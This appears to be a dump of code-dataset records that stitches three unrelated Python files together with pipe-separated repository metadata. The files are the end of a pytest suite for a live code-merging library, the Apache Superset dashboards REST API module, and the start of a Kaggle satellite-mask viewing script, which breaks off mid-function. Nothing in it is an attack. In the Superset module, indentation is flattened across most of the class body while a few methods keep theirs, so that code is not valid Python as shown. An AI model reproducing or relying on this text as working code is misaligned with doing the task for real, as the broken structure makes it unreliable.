def test_commit_noop(dandelion):
    orig = dandelion.read()
    dandelion.main.commit()
    assert dandelion.read() == orig


# merge() alone must not touch the file; commit() writes the merged result.
def test_commit(dandelion):
    orig = dandelion.read()
    dandelion.main.merge(dandelion.cf.v2)
    assert dandelion.read() == orig
    dandelion.main.commit()
    print(dandelion.read().strip())
    assert dandelion.read().strip() == dandelion.read("v2result").strip()


# A deletion-free merge commits only the replacements.
def test_commit_partial(dandelion):
    orig = dandelion.read()
    dandelion.main.merge(dandelion.cf.repl, allow_deletions=False)
    assert dandelion.read() == orig
    dandelion.main.commit()
    assert dandelion.read() == dandelion.read("outcome")


# allow_deletions can whitelist specific definitions for removal.
def test_commit_partial_2(dandelion):
    orig = dandelion.read()
    dandelion.main.merge(
        dandelion.cf.repl,
        allow_deletions=[
            locate(dandelion.module.plack, dandelion.main.code.catalogue())
        ],
    )
    assert dandelion.read() == orig
    dandelion.main.commit()
    assert dandelion.read() == dandelion.read("outcome2")


# commit() must refuse to overwrite a file changed on disk since the merge.
def test_commit_stale(dandelion):
    dandelion.main.merge(dandelion.cf.v2)
    open(dandelion.main.filename, "w").write("")
    with pytest.raises(StaleException):
        dandelion.main.commit()
# A captured reference to a merged function must observe the new behaviour.
def test_functions_interface(elephant):
    do = elephant.module.do
    assert do(7) == ["Paint 7 canvasses", "Sing 7 songs", "Dance for 7 hours"]
    elephant.main.merge(elephant.cf.mod)
    assert do(7) == ["Paint 7 canvasses", "Sing 14 songs", "Dance for 7 hours"]


# Added steps inside a merged function show up in the captured reference.
def test_functions_interface_add(elephant):
    do = elephant.module.do
    assert do(7) == ["Paint 7 canvasses", "Sing 7 songs", "Dance for 7 hours"]
    elephant.main.merge(elephant.cf.more)
    assert do(7) == [
        "Paint 7 canvasses",
        "Sing 7 songs",
        "Worship the 7 suns",
        "Dance for 7 hours",
        "Do 7 push-ups",
    ]


# Removed steps likewise disappear from the captured reference.
def test_functions_interface_rm(elephant):
    do = elephant.module.do
    assert do(7) == ["Paint 7 canvasses", "Sing 7 songs", "Dance for 7 hours"]
    elephant.main.merge(elephant.cf.less)
    assert do(7) == ["Eat 7 bananas"]


# Only *changed* module-level statements are re-executed on merge.
def test_update_statements(firmament):
    assert firmament.module.sirius(5) == 25
    firmament.module.ursa_major.append(888)
    assert firmament.module.betelgeuse == 1000
    firmament.main.merge(firmament.cf.mod)
    assert firmament.module.sirius(5) == 3
    # Does not re-run the ursa_major assignment because it did not change
    assert firmament.module.ursa_major == [1, 2, 3, 4, 888]
    # Re-runs betelgeuse assignment
    assert firmament.module.betelgeuse == 41


# commit() regenerates module-level statements faithfully.
def test_regen_statements(firmament):
    firmament.main.merge(firmament.cf.mod)
    firmament.main.commit()
    assert firmament.read().strip() == firmament.read("result").strip()


# Changing a parent-class method is seen through super() in the subclass.
def test_change_supermethod(glamour):
    assert glamour.module.Scarf(5).swagger() == 10
    glamour.main.merge(glamour.cf.mod, allow_deletions=False)
    assert glamour.module.Scarf(5).swagger() == 15


# Dropping the super() call replaces the method outright.
def test_remove_super(glamour):
    assert glamour.module.Scarf(5).swagger() == 10
    glamour.main.merge(glamour.cf.mod2)
    assert glamour.module.Scarf(5).swagger() == 1234


# New statements/methods added inside a class body are picked up.
def test_add_class_statement(glamour):
    assert glamour.module.Scarf(5).swagger() == 10
    glamour.main.merge(glamour.cf.mod3)
    assert glamour.module.Scarf(5).swagger() == 50
    assert glamour.module.Scarf(5).also_swagger() == 50
    assert glamour.module.Scarf(5).hello() == "hello!"


def test_bad_statement(iguana):
    # This tests that one bad statement will not interfere with the rest of the
    # changes.
    assert iguana.module.lizard(3) == "sss"
    iguana.main.merge(iguana.cf.bad)
    assert iguana.module.lizard(3) == "ssssss"


# set_globals must install the exact dict object, retrievable via get_globals.
def test_set_globals(ballon):
    glb = {"a": 2}
    ballon.main.code.set_globals(glb)
    assert ballon.main.code.get_globals() is glb
| [
"breuleux@gmail.com"
] | breuleux@gmail.com |
8233376cc2e372ec234ab3f707c4847c1250f2c1 | 5b4eca59f344a1a21c7a44d4913611f663f983b1 | /superset/dashboards/api.py | bca033431067798192a3c5eeef22dd508d65c3a8 | [
"Apache-2.0",
"OFL-1.1"
] | permissive | guannie/synapse-superset-public | 3e78d382570c70d69fefa2ee2d4512bbad19bb29 | 5e64d65a8b8202b57b7a98275d4d50416211d49b | refs/heads/master | 2023-08-10T04:28:02.984446 | 2021-08-10T20:38:13 | 2021-08-10T20:38:13 | 203,940,387 | 0 | 0 | Apache-2.0 | 2022-12-19T09:07:00 | 2019-08-23T06:45:49 | Python | UTF-8 | Python | false | false | 33,091 | py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import json
import logging
from datetime import datetime
from io import BytesIO
from typing import Any, Optional
from zipfile import is_zipfile, ZipFile
from flask import g, make_response, redirect, request, Response, send_file, url_for
from flask_appbuilder.api import expose, protect, rison, safe
from flask_appbuilder.hooks import before_request
from flask_appbuilder.models.sqla.interface import SQLAInterface
from flask_babel import ngettext
from marshmallow import ValidationError
from werkzeug.wrappers import Response as WerkzeugResponse
from werkzeug.wsgi import FileWrapper
from superset import is_feature_enabled, thumbnail_cache
from superset.charts.schemas import ChartEntityResponseSchema
from superset.commands.importers.exceptions import NoValidFilesFoundError
from superset.commands.importers.v1.utils import get_contents_from_bundle
from superset.constants import MODEL_API_RW_METHOD_PERMISSION_MAP, RouteMethod
from superset.dashboards.commands.bulk_delete import BulkDeleteDashboardCommand
from superset.dashboards.commands.create import CreateDashboardCommand
from superset.dashboards.commands.delete import DeleteDashboardCommand
from superset.dashboards.commands.exceptions import (
DashboardBulkDeleteFailedError,
DashboardCreateFailedError,
DashboardDeleteFailedError,
DashboardForbiddenError,
DashboardInvalidError,
DashboardNotFoundError,
DashboardUpdateFailedError,
)
from superset.dashboards.commands.export import ExportDashboardsCommand
from superset.dashboards.commands.importers.dispatcher import ImportDashboardsCommand
from superset.dashboards.commands.update import UpdateDashboardCommand
from superset.dashboards.dao import DashboardDAO
from superset.dashboards.filters import (
DashboardAccessFilter,
DashboardFavoriteFilter,
DashboardTitleOrSlugFilter,
FilterRelatedRoles,
)
from superset.dashboards.schemas import (
DashboardDatasetSchema,
DashboardGetResponseSchema,
DashboardPostSchema,
DashboardPutSchema,
get_delete_ids_schema,
get_export_ids_schema,
get_fav_star_ids_schema,
GetFavStarIdsSchema,
openapi_spec_methods_override,
thumbnail_query_schema,
)
from superset.extensions import event_logger
from superset.models.dashboard import Dashboard
from superset.tasks.thumbnails import cache_dashboard_thumbnail
from superset.utils.cache import etag_cache
from superset.utils.screenshots import DashboardScreenshot
from superset.utils.urls import get_url_path
from superset.views.base import generate_download_headers
from superset.views.base_api import (
BaseSupersetModelRestApi,
RelatedFieldFilter,
statsd_metrics,
)
from superset.views.filters import FilterRelatedOwners
logger = logging.getLogger(__name__)


class DashboardRestApi(BaseSupersetModelRestApi):
    """Model-backed REST API for Superset dashboards.

    Exposes the standard CRUD set plus export/import, thumbnail generation,
    favorite-status and chart/dataset lookup endpoints. The OpenAPI spec is
    generated by Flask-AppBuilder from the YAML in each method's docstring.
    """

    datamodel = SQLAInterface(Dashboard)
@before_request(only=["thumbnail"])
def ensure_thumbnails_enabled(self) -> Optional[Response]:
if not is_feature_enabled("THUMBNAILS"):
return self.response_404()
return None
include_route_methods = RouteMethod.REST_MODEL_VIEW_CRUD_SET | {
RouteMethod.EXPORT,
RouteMethod.IMPORT,
RouteMethod.RELATED,
"bulk_delete", # not using RouteMethod since locally defined
"favorite_status",
"get_charts",
"get_datasets",
"thumbnail",
}
resource_name = "dashboard"
allow_browser_login = True
class_permission_name = "Dashboard"
method_permission_name = MODEL_API_RW_METHOD_PERMISSION_MAP
list_columns = [
"id",
"published",
"status",
"slug",
"url",
"css",
"position_json",
"json_metadata",
"thumbnail_url",
"changed_by.first_name",
"changed_by.last_name",
"changed_by.username",
"changed_by.id",
"changed_by_name",
"changed_by_url",
"changed_on_utc",
"changed_on_delta_humanized",
"created_by.first_name",
"created_by.id",
"created_by.last_name",
"dashboard_title",
"owners.id",
"owners.username",
"owners.first_name",
"owners.last_name",
"roles.id",
"roles.name",
]
list_select_columns = list_columns + ["changed_on", "changed_by_fk"]
order_columns = [
"changed_by.first_name",
"changed_on_delta_humanized",
"created_by.first_name",
"dashboard_title",
"published",
]
add_columns = [
"dashboard_title",
"slug",
"owners",
"roles",
"position_json",
"css",
"json_metadata",
"published",
]
edit_columns = add_columns
search_columns = (
"created_by",
"changed_by",
"dashboard_title",
"id",
"owners",
"published",
"roles",
"slug",
)
search_filters = {
"dashboard_title": [DashboardTitleOrSlugFilter],
"id": [DashboardFavoriteFilter],
}
base_order = ("changed_on", "desc")
add_model_schema = DashboardPostSchema()
edit_model_schema = DashboardPutSchema()
chart_entity_response_schema = ChartEntityResponseSchema()
dashboard_get_response_schema = DashboardGetResponseSchema()
dashboard_dataset_schema = DashboardDatasetSchema()
base_filters = [["id", DashboardAccessFilter, lambda: []]]
order_rel_fields = {
"slices": ("slice_name", "asc"),
"owners": ("first_name", "asc"),
"roles": ("name", "asc"),
}
related_field_filters = {
"owners": RelatedFieldFilter("first_name", FilterRelatedOwners),
"roles": RelatedFieldFilter("name", FilterRelatedRoles),
"created_by": RelatedFieldFilter("first_name", FilterRelatedOwners),
}
allowed_rel_fields = {"owners", "roles", "created_by"}
openapi_spec_tag = "Dashboards"
""" Override the name set for this collection of endpoints """
openapi_spec_component_schemas = (
ChartEntityResponseSchema,
DashboardGetResponseSchema,
DashboardDatasetSchema,
GetFavStarIdsSchema,
)
apispec_parameter_schemas = {
"get_delete_ids_schema": get_delete_ids_schema,
"get_export_ids_schema": get_export_ids_schema,
"thumbnail_query_schema": thumbnail_query_schema,
"get_fav_star_ids_schema": get_fav_star_ids_schema,
}
openapi_spec_methods = openapi_spec_methods_override
""" Overrides GET methods OpenApi descriptions """
def __repr__(self) -> str:
"""Deterministic string representation of the API instance for etag_cache."""
return "Superset.dashboards.api.DashboardRestApi@v{}{}".format(
self.appbuilder.app.config["VERSION_STRING"],
self.appbuilder.app.config["VERSION_SHA"],
)
    # ETag cache is keyed on the dashboard's changed_on timestamp and is only
    # active when the DASHBOARD_CACHE feature flag is enabled.
    @etag_cache(
        get_last_modified=lambda _self, id_or_slug: DashboardDAO.get_dashboard_changed_on(  # pylint: disable=line-too-long
            id_or_slug
        ),
        max_age=0,
        raise_for_access=lambda _self, id_or_slug: DashboardDAO.get_by_id_or_slug(
            id_or_slug
        ),
        skip=lambda _self, id_or_slug: not is_feature_enabled("DASHBOARD_CACHE"),
    )
    @expose("/<id_or_slug>", methods=["GET"])
    @protect()
    @safe
    @statsd_metrics
    @event_logger.log_this_with_context(
        action=lambda self, *args, **kwargs: f"{self.__class__.__name__}.get",
        log_to_statsd=False,
    )
    def get(self, id_or_slug: str) -> Response:
        """Gets a dashboard
        ---
        get:
          description: >-
            Get a dashboard
          parameters:
          - in: path
            schema:
              type: string
            name: id_or_slug
            description: Either the id of the dashboard, or its slug
          responses:
            200:
              description: Dashboard
              content:
                application/json:
                  schema:
                    type: object
                    properties:
                      result:
                        $ref: '#/components/schemas/DashboardGetResponseSchema'
            302:
              description: Redirects to the current digest
            400:
              $ref: '#/components/responses/400'
            401:
              $ref: '#/components/responses/401'
            404:
              $ref: '#/components/responses/404'
        """
        # pylint: disable=arguments-differ
        try:
            dash = DashboardDAO.get_by_id_or_slug(id_or_slug)
            result = self.dashboard_get_response_schema.dump(dash)
            return self.response(200, result=result)
        except DashboardNotFoundError:
            return self.response_404()
    # Cache invalidates when either the dashboard or any of its datasets change.
    @etag_cache(
        get_last_modified=lambda _self, id_or_slug: DashboardDAO.get_dashboard_and_datasets_changed_on(  # pylint: disable=line-too-long
            id_or_slug
        ),
        max_age=0,
        raise_for_access=lambda _self, id_or_slug: DashboardDAO.get_by_id_or_slug(
            id_or_slug
        ),
        skip=lambda _self, id_or_slug: not is_feature_enabled("DASHBOARD_CACHE"),
    )
    @expose("/<id_or_slug>/datasets", methods=["GET"])
    @protect()
    @safe
    @statsd_metrics
    @event_logger.log_this_with_context(
        action=lambda self, *args, **kwargs: f"{self.__class__.__name__}.get_datasets",
        log_to_statsd=False,
    )
    def get_datasets(self, id_or_slug: str) -> Response:
        """Gets a dashboard's datasets
        ---
        get:
          description: >-
            Returns a list of a dashboard's datasets. Each dataset includes only
            the information necessary to render the dashboard's charts.
          parameters:
          - in: path
            schema:
              type: string
            name: id_or_slug
            description: Either the id of the dashboard, or its slug
          responses:
            200:
              description: Dashboard dataset definitions
              content:
                application/json:
                  schema:
                    type: object
                    properties:
                      result:
                        type: array
                        items:
                          $ref: '#/components/schemas/DashboardDatasetSchema'
            302:
              description: Redirects to the current digest
            400:
              $ref: '#/components/responses/400'
            401:
              $ref: '#/components/responses/401'
            404:
              $ref: '#/components/responses/404'
        """
        try:
            datasets = DashboardDAO.get_datasets_for_dashboard(id_or_slug)
            result = [
                self.dashboard_dataset_schema.dump(dataset) for dataset in datasets
            ]
            return self.response(200, result=result)
        except DashboardNotFoundError:
            return self.response_404()
@etag_cache(
get_last_modified=lambda _self, id_or_slug: DashboardDAO.get_dashboard_and_slices_changed_on( # pylint: disable=line-too-long
id_or_slug
),
max_age=0,
raise_for_access=lambda _self, id_or_slug: DashboardDAO.get_by_id_or_slug(
id_or_slug
),
skip=lambda _self, id_or_slug: not is_feature_enabled("DASHBOARD_CACHE"),
)
@expose("/<id_or_slug>/charts", methods=["GET"])
@protect()
@safe
@statsd_metrics
@event_logger.log_this_with_context(
action=lambda self, *args, **kwargs: f"{self.__class__.__name__}.get_charts",
log_to_statsd=False,
)
def get_charts(self, id_or_slug: str) -> Response:
"""Gets the chart definitions for a given dashboard
---
get:
description: >-
Get the chart definitions for a given dashboard
parameters:
- in: path
schema:
type: string
name: id_or_slug
responses:
200:
description: Dashboard chart definitions
content:
application/json:
schema:
type: object
properties:
result:
type: array
items:
$ref: '#/components/schemas/ChartEntityResponseSchema'
302:
description: Redirects to the current digest
400:
$ref: '#/components/responses/400'
401:
$ref: '#/components/responses/401'
404:
$ref: '#/components/responses/404'
"""
try:
charts = DashboardDAO.get_charts_for_dashboard(id_or_slug)
result = [self.chart_entity_response_schema.dump(chart) for chart in charts]
if is_feature_enabled("REMOVE_SLICE_LEVEL_LABEL_COLORS"):
# dashboard metadata has dashboard-level label_colors,
# so remove slice-level label_colors from its form_data
for chart in result:
form_data = chart.get("form_data")
form_data.pop("label_colors", None)
return self.response(200, result=result)
except DashboardNotFoundError:
return self.response_404()
@expose("/", methods=["POST"])
@protect()
@safe
@statsd_metrics
@event_logger.log_this_with_context(
action=lambda self, *args, **kwargs: f"{self.__class__.__name__}.post",
log_to_statsd=False,
)
def post(self) -> Response:
"""Creates a new Dashboard
---
post:
description: >-
Create a new Dashboard.
requestBody:
description: Dashboard schema
required: true
content:
application/json:
schema:
$ref: '#/components/schemas/{{self.__class__.__name__}}.post'
responses:
201:
description: Dashboard added
content:
application/json:
schema:
type: object
properties:
id:
type: number
result:
$ref: '#/components/schemas/{{self.__class__.__name__}}.post'
302:
description: Redirects to the current digest
400:
$ref: '#/components/responses/400'
401:
$ref: '#/components/responses/401'
404:
$ref: '#/components/responses/404'
500:
$ref: '#/components/responses/500'
"""
if not request.is_json:
return self.response_400(message="Request is not JSON")
try:
item = self.add_model_schema.load(request.json)
# This validates custom Schema with custom validations
except ValidationError as error:
return self.response_400(message=error.messages)
try:
new_model = CreateDashboardCommand(g.user, item).run()
return self.response(201, id=new_model.id, result=item)
except DashboardInvalidError as ex:
return self.response_422(message=ex.normalized_messages())
except DashboardCreateFailedError as ex:
logger.error(
"Error creating model %s: %s",
self.__class__.__name__,
str(ex),
exc_info=True,
)
return self.response_422(message=str(ex))
@expose("/<pk>", methods=["PUT"])
@protect()
@safe
@statsd_metrics
@event_logger.log_this_with_context(
action=lambda self, *args, **kwargs: f"{self.__class__.__name__}.put",
log_to_statsd=False,
)
def put(self, pk: int) -> Response:
"""Changes a Dashboard
---
put:
description: >-
Changes a Dashboard.
parameters:
- in: path
schema:
type: integer
name: pk
requestBody:
description: Dashboard schema
required: true
content:
application/json:
schema:
$ref: '#/components/schemas/{{self.__class__.__name__}}.put'
responses:
200:
description: Dashboard changed
content:
application/json:
schema:
type: object
properties:
id:
type: number
result:
$ref: '#/components/schemas/{{self.__class__.__name__}}.put'
400:
$ref: '#/components/responses/400'
401:
$ref: '#/components/responses/401'
403:
$ref: '#/components/responses/403'
404:
$ref: '#/components/responses/404'
422:
$ref: '#/components/responses/422'
500:
$ref: '#/components/responses/500'
"""
if not request.is_json:
return self.response_400(message="Request is not JSON")
try:
item = self.edit_model_schema.load(request.json)
# This validates custom Schema with custom validations
except ValidationError as error:
return self.response_400(message=error.messages)
try:
changed_model = UpdateDashboardCommand(g.user, pk, item).run()
response = self.response(200, id=changed_model.id, result=item)
except DashboardNotFoundError:
response = self.response_404()
except DashboardForbiddenError:
response = self.response_403()
except DashboardInvalidError as ex:
return self.response_422(message=ex.normalized_messages())
except DashboardUpdateFailedError as ex:
logger.error(
"Error updating model %s: %s",
self.__class__.__name__,
str(ex),
exc_info=True,
)
response = self.response_422(message=str(ex))
return response
@expose("/<pk>", methods=["DELETE"])
@protect()
@safe
@statsd_metrics
@event_logger.log_this_with_context(
action=lambda self, *args, **kwargs: f"{self.__class__.__name__}.delete",
log_to_statsd=False,
)
def delete(self, pk: int) -> Response:
"""Deletes a Dashboard
---
delete:
description: >-
Deletes a Dashboard.
parameters:
- in: path
schema:
type: integer
name: pk
responses:
200:
description: Dashboard deleted
content:
application/json:
schema:
type: object
properties:
message:
type: string
401:
$ref: '#/components/responses/401'
403:
$ref: '#/components/responses/403'
404:
$ref: '#/components/responses/404'
422:
$ref: '#/components/responses/422'
500:
$ref: '#/components/responses/500'
"""
try:
DeleteDashboardCommand(g.user, pk).run()
return self.response(200, message="OK")
except DashboardNotFoundError:
return self.response_404()
except DashboardForbiddenError:
return self.response_403()
except DashboardDeleteFailedError as ex:
logger.error(
"Error deleting model %s: %s",
self.__class__.__name__,
str(ex),
exc_info=True,
)
return self.response_422(message=str(ex))
@expose("/", methods=["DELETE"])
@protect()
@safe
@statsd_metrics
@rison(get_delete_ids_schema)
@event_logger.log_this_with_context(
action=lambda self, *args, **kwargs: f"{self.__class__.__name__}.bulk_delete",
log_to_statsd=False,
)
def bulk_delete(self, **kwargs: Any) -> Response:
"""Delete bulk Dashboards
---
delete:
description: >-
Deletes multiple Dashboards in a bulk operation.
parameters:
- in: query
name: q
content:
application/json:
schema:
$ref: '#/components/schemas/get_delete_ids_schema'
responses:
200:
description: Dashboard bulk delete
content:
application/json:
schema:
type: object
properties:
message:
type: string
401:
$ref: '#/components/responses/401'
403:
$ref: '#/components/responses/403'
404:
$ref: '#/components/responses/404'
422:
$ref: '#/components/responses/422'
500:
$ref: '#/components/responses/500'
"""
item_ids = kwargs["rison"]
try:
BulkDeleteDashboardCommand(g.user, item_ids).run()
return self.response(
200,
message=ngettext(
"Deleted %(num)d dashboard",
"Deleted %(num)d dashboards",
num=len(item_ids),
),
)
except DashboardNotFoundError:
return self.response_404()
except DashboardForbiddenError:
return self.response_403()
except DashboardBulkDeleteFailedError as ex:
return self.response_422(message=str(ex))
@expose("/export/", methods=["GET"])
@protect()
@safe
@statsd_metrics
@rison(get_export_ids_schema)
@event_logger.log_this_with_context(
action=lambda self, *args, **kwargs: f"{self.__class__.__name__}.export",
log_to_statsd=False,
)
def export(self, **kwargs: Any) -> Response:
"""Export dashboards
---
get:
description: >-
Exports multiple Dashboards and downloads them as YAML files.
parameters:
- in: query
name: q
content:
application/json:
schema:
$ref: '#/components/schemas/get_export_ids_schema'
responses:
200:
description: Dashboard export
content:
text/plain:
schema:
type: string
400:
$ref: '#/components/responses/400'
401:
$ref: '#/components/responses/401'
404:
$ref: '#/components/responses/404'
422:
$ref: '#/components/responses/422'
500:
$ref: '#/components/responses/500'
"""
requested_ids = kwargs["rison"]
if is_feature_enabled("VERSIONED_EXPORT"):
token = request.args.get("token")
timestamp = datetime.now().strftime("%Y%m%dT%H%M%S")
root = f"dashboard_export_{timestamp}"
filename = f"{root}.zip"
buf = BytesIO()
with ZipFile(buf, "w") as bundle:
try:
for file_name, file_content in ExportDashboardsCommand(
requested_ids
).run():
with bundle.open(f"{root}/{file_name}", "w") as fp:
fp.write(file_content.encode())
except DashboardNotFoundError:
return self.response_404()
buf.seek(0)
response = send_file(
buf,
mimetype="application/zip",
as_attachment=True,
attachment_filename=filename,
)
if token:
response.set_cookie(token, "done", max_age=600)
return response
query = self.datamodel.session.query(Dashboard).filter(
Dashboard.id.in_(requested_ids)
)
query = self._base_filters.apply_all(query)
ids = [item.id for item in query.all()]
if not ids:
return self.response_404()
export = Dashboard.export_dashboards(ids)
resp = make_response(export, 200)
resp.headers["Content-Disposition"] = generate_download_headers("json")[
"Content-Disposition"
]
return resp
@expose("/<pk>/thumbnail/<digest>/", methods=["GET"])
@protect()
@safe
@rison(thumbnail_query_schema)
@event_logger.log_this_with_context(
action=lambda self, *args, **kwargs: f"{self.__class__.__name__}.thumbnail",
log_to_statsd=False,
)
def thumbnail(self, pk: int, digest: str, **kwargs: Any) -> WerkzeugResponse:
"""Get Dashboard thumbnail
---
get:
description: >-
Compute async or get already computed dashboard thumbnail from cache.
parameters:
- in: path
schema:
type: integer
name: pk
- in: path
name: digest
description: A hex digest that makes this dashboard unique
schema:
type: string
- in: query
name: q
content:
application/json:
schema:
$ref: '#/components/schemas/thumbnail_query_schema'
responses:
200:
description: Dashboard thumbnail image
content:
image/*:
schema:
type: string
format: binary
202:
description: Thumbnail does not exist on cache, fired async to compute
content:
application/json:
schema:
type: object
properties:
message:
type: string
401:
$ref: '#/components/responses/401'
404:
$ref: '#/components/responses/404'
422:
$ref: '#/components/responses/422'
500:
$ref: '#/components/responses/500'
"""
dashboard = self.datamodel.get(pk, self._base_filters)
if not dashboard:
return self.response_404()
dashboard_url = get_url_path(
"Superset.dashboard", dashboard_id_or_slug=dashboard.id
)
# If force, request a screenshot from the workers
if kwargs["rison"].get("force", False):
cache_dashboard_thumbnail.delay(dashboard_url, dashboard.digest, force=True)
return self.response(202, message="OK Async")
# fetch the dashboard screenshot using the current user and cache if set
screenshot = DashboardScreenshot(
dashboard_url, dashboard.digest
).get_from_cache(cache=thumbnail_cache)
# If the screenshot does not exist, request one from the workers
if not screenshot:
self.incr_stats("async", self.thumbnail.__name__)
cache_dashboard_thumbnail.delay(dashboard_url, dashboard.digest, force=True)
return self.response(202, message="OK Async")
# If digests
if dashboard.digest != digest:
self.incr_stats("redirect", self.thumbnail.__name__)
return redirect(
url_for(
f"{self.__class__.__name__}.thumbnail",
pk=pk,
digest=dashboard.digest,
)
)
self.incr_stats("from_cache", self.thumbnail.__name__)
return Response(
FileWrapper(screenshot), mimetype="image/png", direct_passthrough=True
)
@expose("/favorite_status/", methods=["GET"])
@protect()
@safe
@statsd_metrics
@rison(get_fav_star_ids_schema)
@event_logger.log_this_with_context(
action=lambda self, *args, **kwargs: f"{self.__class__.__name__}"
f".favorite_status",
log_to_statsd=False,
)
def favorite_status(self, **kwargs: Any) -> Response:
"""Favorite Stars for Dashboards
---
get:
description: >-
Check favorited dashboards for current user
parameters:
- in: query
name: q
content:
application/json:
schema:
$ref: '#/components/schemas/get_fav_star_ids_schema'
responses:
200:
description:
content:
application/json:
schema:
$ref: "#/components/schemas/GetFavStarIdsSchema"
400:
$ref: '#/components/responses/400'
401:
$ref: '#/components/responses/401'
404:
$ref: '#/components/responses/404'
500:
$ref: '#/components/responses/500'
"""
requested_ids = kwargs["rison"]
dashboards = DashboardDAO.find_by_ids(requested_ids)
if not dashboards:
return self.response_404()
favorited_dashboard_ids = DashboardDAO.favorited_ids(
dashboards, g.user.get_id()
)
res = [
{"id": request_id, "value": request_id in favorited_dashboard_ids}
for request_id in requested_ids
]
return self.response(200, result=res)
@expose("/import/", methods=["POST"])
@protect()
@statsd_metrics
@event_logger.log_this_with_context(
action=lambda self, *args, **kwargs: f"{self.__class__.__name__}.import_",
log_to_statsd=False,
)
def import_(self) -> Response:
"""Import dashboard(s) with associated charts/datasets/databases
---
post:
requestBody:
required: true
content:
multipart/form-data:
schema:
type: object
properties:
formData:
description: upload file (ZIP or JSON)
type: string
format: binary
passwords:
description: JSON map of passwords for each file
type: string
overwrite:
description: overwrite existing databases?
type: boolean
responses:
200:
description: Dashboard import result
content:
application/json:
schema:
type: object
properties:
message:
type: string
400:
$ref: '#/components/responses/400'
401:
$ref: '#/components/responses/401'
422:
$ref: '#/components/responses/422'
500:
$ref: '#/components/responses/500'
"""
upload = request.files.get("formData")
if not upload:
return self.response_400()
if is_zipfile(upload):
with ZipFile(upload) as bundle:
contents = get_contents_from_bundle(bundle)
else:
upload.seek(0)
contents = {upload.filename: upload.read()}
if not contents:
raise NoValidFilesFoundError()
passwords = (
json.loads(request.form["passwords"])
if "passwords" in request.form
else None
)
overwrite = request.form.get("overwrite") == "true"
command = ImportDashboardsCommand(
contents, passwords=passwords, overwrite=overwrite
)
command.run()
return self.response(200, message="OK")
| [
"noreply@github.com"
] | noreply@github.com |
2ded6d1331e6c08a950ed3425fae0dc00936f50f | ed842d4a85d16e9248fe54a018fde1e781b885d5 | /view_masks.py | b5e84dc0a6e433f9a42587e8ea54ae9c165f953b | [] | no_license | jmargieh/kaggle_dstl_satellite | cd0cede9978014d7743a38d6c2884494b6b720ca | 9e60ea20d2edd861c8585f149d1b6ebca2bb891a | refs/heads/master | 2020-03-27T00:09:00.809288 | 2017-04-28T00:52:51 | 2017-04-28T00:52:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,948 | py | import logging
import os
import numpy as np
import cv2
from config import IMAGES_METADATA_FILENAME, IMAGES_PREDICTION_MASK_DIR, \
IMAGES_MASKS_FILENAME, IMAGES_NORMALIZED_DATA_DIR, IMAGES_NORMALIZED_M_FILENAME, \
IMAGES_NORMALIZED_SHARPENED_FILENAME, IMAGES_MEANS_STDS_FILENAME, CLASSES_NAMES
from config import IMAGES_METADATA_POLYGONS_FILENAME
from create_submission import create_image_polygons
from utils.data import load_pickle, get_train_test_images_ids
from utils.matplotlib import matplotlib_setup, plot_image, plot_polygons, plot_two_masks
from utils.polygon import jaccard_coef, create_mask_from_polygons, simplify_mask, stack_masks
def main(kind, model_name='softmax_pansharpen_tiramisu_small_patch',
         debug_image_ids=('6040_4_4',)):
    """Evaluate predicted segmentation masks against ground truth.

    Args:
        kind: which split to evaluate — 'train' (ground truth available, so
            jaccard scores are computed and logged) or 'test' (predictions only).
        model_name: suffix of the prediction-mask files loaded from
            IMAGES_PREDICTION_MASK_DIR ('<img_id>_<model_name>.npy').
            Previously hard-coded inside the function body.
        debug_image_ids: iterable of image ids to restrict the run to, or None
            to process every target image. The default preserves the original
            (debug-leftover) behaviour of only processing '6040_4_4'.

    Raises:
        ValueError: if ``kind`` is neither 'train' nor 'test'.
    """
    logging.basicConfig(
        level=logging.INFO,
        format="%(asctime)s : %(levelname)s : %(module)s : %(message)s",
        datefmt="%d-%m-%Y %H:%M:%S",
    )
    matplotlib_setup()

    # Load cached images, masks and metadata produced by the preprocessing steps.
    images_data = load_pickle(IMAGES_NORMALIZED_SHARPENED_FILENAME)
    logging.info('Images: %s', len(images_data))
    images_masks = load_pickle(IMAGES_MASKS_FILENAME)
    logging.info('Masks: %s', len(images_masks))
    images_metadata = load_pickle(IMAGES_METADATA_FILENAME)
    logging.info('Metadata: %s', len(images_metadata))
    images_metadata_polygons = load_pickle(IMAGES_METADATA_POLYGONS_FILENAME)
    logging.info('Polygons metadata: %s', len(images_metadata_polygons))
    mean_sharpened, std_sharpened = load_pickle(IMAGES_MEANS_STDS_FILENAME)
    logging.info('Mean: %s, Std: %s', mean_sharpened.shape, std_sharpened.shape)

    images_all, images_train, images_test = get_train_test_images_ids()
    logging.info('Train: %s, test: %s, all: %s', len(images_train), len(images_test), len(images_all))

    if kind == 'test':
        target_images = images_test
    elif kind == 'train':
        target_images = images_train
    else:
        raise ValueError('Unknown kind: {}'.format(kind))
    nb_target_images = len(target_images)
    logging.info('Target images: %s - %s', kind, nb_target_images)

    nb_classes = len(images_masks[images_train[0]])
    classes = np.arange(1, nb_classes + 1)

    # Ground-truth stacked masks only exist for the train split.
    images_masks_stacked = None
    if kind == 'train':
        images_masks_stacked = stack_masks(target_images, images_masks, classes)
        logging.info('Masks stacked: %s', len(images_masks_stacked))

    jaccards = []
    jaccards_simplified = []
    for img_idx, img_id in enumerate(target_images):
        # Optional restriction for debugging a specific tile.
        if debug_image_ids is not None and img_id not in debug_image_ids:
            continue

        mask_filename = os.path.join(IMAGES_PREDICTION_MASK_DIR, '{0}_{1}.npy'.format(img_id, model_name))
        if not os.path.isfile(mask_filename):
            logging.warning('Cannot find masks for image: %s', img_id)
            continue

        # Train images are denormalized from the cache; test images come from disk.
        img_data = None
        if kind == 'train':
            img_data = images_data[img_id] * std_sharpened + mean_sharpened
        if kind == 'test':
            img_filename = os.path.join(IMAGES_NORMALIZED_DATA_DIR, img_id + '.npy')
            img_data = np.load(img_filename)

        img_metadata = images_metadata[img_id]
        img_mask_pred = np.load(mask_filename)

        if kind == 'train':
